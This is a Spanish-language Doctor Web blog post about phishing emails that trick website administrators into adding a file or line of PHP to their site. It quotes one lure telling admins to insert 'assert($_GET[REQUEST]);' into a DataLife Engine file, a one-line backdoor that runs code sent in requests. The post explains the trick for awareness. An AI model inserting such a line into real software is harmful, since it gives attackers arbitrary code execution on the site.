¡Vd. usa un navegador obsoleto!

Es posible que la página no se visualice correctamente.

  • añadir a favoritos
    Añadir a marcadores

Phishing para administradores de sistemas

Consultas: 2028 Comentarios: 2 Ranking: 9

viernes, 2 de marzo de 2018

A los phishers les gusta mucho atacar a managers de oficina porque los mismos reciben muchos mensajes y no los leen atentamente. Pero esto no quiere decir que otras categorías de empleados no les interesen a los phishers. Por ejemplo, un ejemplo de mensaje para administradores:

#drweb

En realidad tenemos un servicio en InternetDr.Web AV-Desk, por lo tanto, es muy probable que uno reciba un mensaje sobre problemas del dominio de nombre parecido.

Pero vamos a verlo con más detalle. El mensaje fue enviado a la dirección del departamento de marketing. ¿Qué tiene que ver el mismo con la propiedad del sitio web? Además, en vez de solicitar los documentos que confirman el derecho de administración del dominio, nos piden que creemos un archivo. Hasta sin consultar el contenido del archivo, y ¿si en realidad hemos hackeado y robado un sitio web? En este caso, crearemos el archivo requerido fácilmente.

Como siempre en estos casos, hay mucha prisa y se provoca el pánico, nos ofrecen 3 días y ni un solo minuto más. A propósito, recibimos el mensaje el 2 de junio, por lo tanto, había que hacerlo todo durante ese día.

Ahora vamos a comprobar los teléfonos con una búsqueda simple: es evidente que los mismos no pertenecen a ningún registrador de sitios web.

Cabe destacar que este envío se detecta en Internet ya hace varios días. Y la dirección del remitente es correcta. Y los malintencionados suponen que el usuario, al crear un sitio web, añadirá un backdoor al mismo. Al consultar el archivo del sitio web que contiene assert, se ejecutará un código enviado en opciones.

Lo he comprobado, el mensaje fue recibido del registrador. Empecé a seguir las instrucciones de mis jefes. Tardé unos 10 minutos en crear el archivo y ubicarlo en el sitio web. Decido contestar al mensaje del registrador, porque, si no encuentran el archivo, habrá problemas con mi dominio. Hago clic sobre el botón del cliente de correo «Contestar», en el mensaje informo que he terminado de añadir el archivo a mi sitio web. Envío el mensaje.

Vd. pensará que yo enseguida entendí que el mensaje de un malintencionado. Ya mencioné que había comprobado el mensaje y que su remitente fue el registrador, por lo tanto, todo va bien, recibo una respuesta a mi mensaje.

http://vbsupport.org/forum/showthread.php?t=52773

No hemos contestado a este mensaje. Pero no todo el mundo hace lo mismo, lamentablemente.

Los usuarios no deben hacer muchas acciones: solo crear un directorio, un archivo, escribir una línea en este archivo.

El problema es que al usuario se le ofrece crear un archivo con un código php ordinario a primera vista. Pero al consultar la descripción de la función assert, enseguida será claro que los malintencionados simplemente ejecutan el código que necesitan.

https://habrahabr.ru/post/265513

https://habrahabr.ru/post/265515

Decidí eliminar el archivo de mi sitio web.
Y luego recibí una respuesta a mi mensaje que escribí en respuesta al mensaje requiriendo añadir el archivo a mi sitio web.
El mensaje decía:

Buenos días:

El mensaje que Vd. recibió es de estafa y no tiene nada que ver con R01.

No recomendamos implementar el código indicado porque el mismo permitirá a los malintencionados hacer cualquier manipulación con el contenido de Su sitio web. Si el código fue añadido al sitio web, recomendamos escanear el sitio web en busca del código nocivo y/o restaurar el estado del sitio web a partir de la copia de seguridad.

Atentamente,

...

Hay otros ejemplos de phishing para administradores.

Le informamos que nuestros expertos detectaron una vulnerabilidad crítica en Su sitio web que permite a los malintencionados acceder a la base de datos de su sitio web por causa de filtrado de datos insuficiente.

Según nuestros datos, un 60% de los sitios web que usan «DataLife Engine» son vulnerables y pueden ser hackeados con esta vulnerabilidad. Por eso hemos decidido informar a los administradores de los sitios web vulnerables, para que los mismos pudieran proteger sus sitios web de las acciones ilegales de los malintencionados.

Para corregir la vulnerabilidad, en el editor de texto abra el archivo de Su sitio web: /engine/engine.php y al principio, después de la línea:

añada:
assert($_GET[REQUEST]);

http://vbsupport.org/forum/showthread.php?t=50483

#phishing #ingeniería_social #seguridad_corporativa

El mundo de antivirus recomienda

Al consultar los mensajes entrantes, siempre esté atento. La absoluta mayoría de los mensajes phishing puede ser detectada por características formales: ausencia del remitente conocido, saludo personal y la información de contacto. En caso contrario, Vd. puede enviar dinero a los malintencionados o, como en este caso, “abrir la puerta” a los mismos.

Y, por supuesto, no olvide que el uso del antispam protegerá no solo contra la basura del correo y phishing, sino también contra los troyanos cifradores.

[Twitter]

Nos importa su opinión

Para redactar un comentario, debe iniciar sesión para entrar en su cuenta del sitio web Doctor Web. - Si aún no tiene la cuenta, puede crearla.

Comentarios de usuarios